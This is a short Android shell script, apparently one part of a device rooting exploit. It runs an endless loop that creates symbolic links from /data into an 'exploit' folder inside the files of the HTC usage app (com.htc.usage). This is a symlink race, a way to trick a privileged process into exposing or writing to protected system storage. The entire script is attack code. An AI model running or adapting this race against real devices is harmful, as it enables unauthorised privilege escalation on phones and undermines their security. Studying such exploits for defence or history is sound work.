#!/system/bin/sh
while true; do
ln -s /data /data/data/com.htc.usage/files/exploit/test1
ln -s /data /data/data/com.htc.usage/files/exploit/test2
ln -s /data /data/data/com.htc.usage/files/exploit/test3
done
